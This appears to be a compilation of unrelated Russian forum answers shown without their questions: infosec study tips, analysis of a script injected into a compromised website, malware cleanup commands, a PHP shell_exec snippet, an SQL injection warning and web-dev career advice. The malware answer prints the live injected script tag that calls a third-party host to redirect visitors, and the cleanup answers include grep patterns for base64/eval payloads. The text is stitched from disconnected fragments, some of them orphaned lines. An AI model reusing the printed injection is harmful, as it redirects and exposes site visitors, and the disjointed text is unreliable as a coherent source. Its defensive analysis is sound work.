Константин

На инженера-программиста может пойти и обладатель кулинарного средне-специального образования. Или человек вообще без средне-специального образования.

Начните с университетского курса по ИБ. Реверсинжиниринг, анализ трафика, навыки программирования, аудит инфобезопасности и анализ защищенности, системное администрирование, криптоанализ, безопасность мобильных приложений.... Вот это и есть "основа основ". Разумеется, для того, что-бы участвовать в соревнованиях к этим основам надо существенно "добавить" всякого, чего можно поверх теории освоить исключительно из практики.

rdesktop/remmina

1. Функция checkOne() достаёт ключевые слова из тега <meta name="keywords" content="..." />
2. Если ключевые слова не найдены, то скрипт берёт ключевые фразы из utm_term.
3. Если ключевые фразы из utm_term не найдены, то используется title страницы.

Найденные ключевые слова кодируются и отправляются в ktm-pohlenz.de/js/jquery.min.php. В результате вставляется JavaScript, который редиректит пользователя на URL адрес, максимально соответствующий найденным ключевым словам и HTTP referer страницы. Пример для этой страницы:

<script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm=http%3A%2F%2Fktm…IT%26se_referrer%3Dhttps%253A%252F%252Ftoster.ru%252F%26source%3Dtoster.ru"></script>

P.S.: Редирект возвращается не всегда. Возможно на стороне ktm-pohlenz.de есть какая-то фильтрация по IP, UA, параметру c_utt и т. д.

Сам отвечаю - перестало появляется
Поискал все файлы на слово base64 заметил что в трех картинках есть это слово - удалил, перестало появлятся

слово base64 само по себе не зло, в обычном php часто встречается, но в картинках его быть не должно

теперь периодически ищю скриптом

#!/bin/bash
find . -iname '*.gif' -type f -print| xargs grep "base64" > result.txt
find . -iname '*.jpeg' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.jpg' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.htm' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.html' -type f -print| xargs grep "base64" >> result.txt
find . -type f -print| xargs grep -i "uniplacer" >> result.txt

У вас где-то залит shell-скрипт. В идеале нужно все переустановить.
Wordpress в обязательном порядке, тему и все плагины. Если на сервере под одним пользователем несколько сайтов, то такой враг может быть в любом из них.

Если у вас есть доступ к серверу по SSH, то выполните команду

find . -type f -name '*.php' | xargs grep -l "x63" --color

или

find . -type f -name '*.php' | xargs grep -l "x47" --color

"точка" после find обозначает искать в папке, в которой находитесь, замените ее на путь к папке, где лежат ваш сайт или сайты или вообще заменить на слеш / тогда искать будет по всему серверу.

Команда ищет файлы в содержании, которых есть текст "x63" или "x47". В 99% случаях из таких кодов состоит шифровка вражеских вирусов. Обратите внимание на файлы, которые найдет команда. Откройте их и посмотрите содержание. Код вируса вы сразу увидите, он весь шифрованный base64 и присутствуют команды eval. Чистите или восстановите данные файлы на чистые.

Самый простой способ - завести SSH ключ чтобы логиниться без пароля, и в пхп написать
$out = shell_exec("ssh user@host 'df -BM'");
ну и распарсить потом $out;

в пользовательском коде будет гораздо больше дыр, чем в стэке.

Что для этого нужно диктуют работодатели. Определите примерную ЗП которую хотите. Посмотрите список вакансий предлагающую её. Просмотрите их требования.

У всех работодателей разная специфика. Кто-то штампует лендинги. Тут важным критерием будет насколько быстро вы можете сверстать такой, и не очень важно какие технологии вы используете.

Кто-то выполняет разработку сайтов под ключ на WordPress. Тут вам нужно помимо помимо знаний html, css понимать как работает ВП: Какой html он генерирует при выводе меню, в каком виде он создаёт виджеты, какие теги он генерирует сам, а какие должны прописать вы. И т. д.

У кого-то может быть один крупный корпоративный сайт. Тут вам пригодятся другие навыки.

для этой сферы необходимо: html, css, botstrap. flexbox, grid, sass,javascript, jQuery, ES6, React.js, git

Еееее ... нет.

• html, css — Основные технологии для верстки.
  
• flexbox, grid — отдельные свойства стилей. Должны изучаться вместе со всем остальным css.
  
• javascript — Будет большим плюсом для верстки.
  
• ES6 — Спецификация javascript. Должна изучаться вместе со всем остальным javascript. Это если вы хотите более серьёзно расти в этом направлении.
  
• git — Будет полезен лично вам и не плохим плюсом в резюме при работе над большими проектами. При конвеерной верстке лендингов этого от вас навряд кто-то будет требовать.
  
• botstrap — Набор готовых стилей. Требуется не всегда и не везде.
  
• jQuery — Абстракция над скриптами. Требуется не всегда и не везде.
  
• sass — Препроцессор. Альтернатива css. Требуется не всегда и не везде.
  
• React.js — javascript Фреймворк. Требуется не всегда и не везде.
  

Стоит ли задумываться о платных курсах

Если видите, что того что есть в интернете вам не хватает — да. Если понимаете что без наставника у которого можна переспросить или попросить объяснить какой-то момент вы не справляетесь — да.

За сколько я могу освоить эту отрасль для того, чтобы найти работу и развиваться дальше?

Вы хоть уже можете начать поиски работы. Есть работодатели готовые нанимать новичков, за дешево и давать им базовые знания. И ставить на простые задачи.

задумалась о фрилансе

На ваше усмотрение. Но будьте готовы к большой конкуренции. С фрилансом такое дело, что вы и разработчик и менеджер по работе с клиентом. В то время как в нормальных организациях, обязанности по работе с клиентом ложатся на другого человека.

или дистанционной работе, это реально, или лучше сперва работать на компанию

Всё зависит от специфики компании. Как вам будет удобнее. Но если хотите развивать навыки коммуникации я бы не брал удалёнку.

UPD.
По личному опыту добавлю, что обучение само по себе это хорошо. Но не очень полезно. Но вот обучение в рамках решения каких-то задач — куда лучше.
Это как с советами — он должен быть к месту. Если я просто расскажу вам что есть метод Element.scrollIntoViewIfNeeded() то скорее всего вы забудете о нем через пару дней. Но вот изучив его пытаясь найти решение какой-то проблемы — запомните о нем надолго.

Так, что лучше всего найти какую-то работу и развиваться в рамках поставленных задач. Когда поймёте, что перестали расти — меняйте работу. У вас уже будет какой-то опыт и портфолио.

Так же хобби проекты — как для меня, отличный способ "прокачки". Но это только в том случае если у вас есть страсть и желание искать новые способы, технологии для развития и улучшения своего детища.

У вас в коде возможна sql инъекция.
'SELECT * FROM `users` WHERE `id` = "'.$user_id.'"
Инструкция как их избежать:
habr
php.net

VNC+IPMI как софтовое решение.
Ну или IP-KVM для железного.

Да, называется IP-KVM

Вот тут схема выдачи адресов в инете.
У провов адреса могут теоретически забирать, сами провы могут умирать, так что нет ничего вечного на земле.
Операторы VPS то же не вечны - разорится контора и абзац.

Пусть девайс отправляет данные по доменному имени.
Или пусть девайс сообщает кому следует (по доменному имени) свой актуальный IP.
Или девайс может с помощью DDNS привязывать свой IP к доменному имени.
Я бы выбрал первый вариант.
Вопрос с доменным именем решить гораздо проще, чем с IP адресами - положил 100500 денег на счет и лет на 10 доменное имя твое.

Вот вы сейчас выключите девайс, он например настроен на IPv4, включите через 10 лет, а там уже все на IPv6 и провы уже забыли, что когда то был IPv4. А если включите через 20 лет, то там уже и IPv10 подоспеет. Да по оптике уже никто не подключает, а использует квантовую передачу данных и там вообще нет никаких IP, а компьютеры отзываются по имени отчеству. Да и вообще железо уже тупо может не завестись.